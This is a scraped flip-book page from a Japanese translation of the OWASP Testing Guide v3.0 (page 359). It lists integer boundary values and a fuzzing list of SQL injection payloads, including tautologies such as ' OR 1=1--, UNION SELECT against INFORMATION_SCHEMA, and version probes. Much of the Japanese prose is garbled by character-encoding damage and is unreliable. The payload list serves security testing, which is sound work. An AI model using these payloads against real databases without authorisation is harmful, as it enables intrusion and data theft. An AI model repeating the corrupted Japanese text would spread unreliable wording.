11.05.2014 Views

OWASP テスティングガイド

OWASP テスティングガイド

OWASP テスティングガイド

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

<strong>OWASP</strong> Testing Guide v3.0<br />

0x7ffffffe<br />

0x7fffffff<br />

0x80000000<br />

0xfffffffe<br />

0xffffffff<br />

0x10000<br />

0x100000<br />

SQL アンヱジェクシュンヱ<br />

この 攻 撃 は、アプヨクーサュヱのデーソプーシ 層 に 影 響 し、SQL 文 においてヤーゴの 入 力 がフィラソされていないときに、 一<br />

般 的 には 発 生 します。<br />

SQL イヱザェキサュヱにテシトについての 詳 細 は、SQL イヱザェキサュヱに 対 するテシトのスキサュヱを 見 てください。<br />

SQL イヱザェキサュヱは、デーソプーシの 情 報 が 公 開 される( 受 動 的 'か、それとも、デーソプーシの 情 報 が 変 更 される( 能 動<br />

的 'かによって、 次 のような 2 つのォテゲヨに 分 類 されます。<br />

• 受 動 的 SQL イヱザェキサュヱ<br />

• 能 動 的 SQL イヱザェキサュヱ<br />

能 動 的 SQL イヱザェキサュヱの 文 は、もし 実 行 が 成 功 したら、 下 層 のデーソプーシに 決 定 的 な 影 響 があります。<br />

受 動 的 SQL インジェクション(SQP;PASSIVE SQL INJECTION)<br />

'||(elt(-3+5,bin(15),ord(10),hex(char(45))))<br />

||6<br />

'||'6<br />

(||6)<br />

' OR 1=1--<br />

OR 1=1<br />

' OR '1'='1<br />

; OR '1'='1'<br />

%22+or+isnull%281%2F0%29+%2F*<br />

%27+OR+%277659%27%3D%277659<br />

%22+or+isnull%281%2F0%29+%2F*<br />

%27+--+<br />

' or 1=1--<br />

" or 1=1--<br />

' or 1=1 /*<br />

or 1=1--<br />

' or 'a'='a<br />

" or "a"="a<br />

') or ('a'='a<br />

Admin' OR '<br />

'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--<br />

) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;<br />

' having 1=1--<br />

' having 1=1--<br />

' group by userid having 1=1--<br />

' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')-<br />

-<br />

' or 1 in (select @@version)--<br />

' union all select @@version--<br />

' OR 'unusual' = 'unusual'<br />

' OR 'something' = 'some'+'thing'<br />

359

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!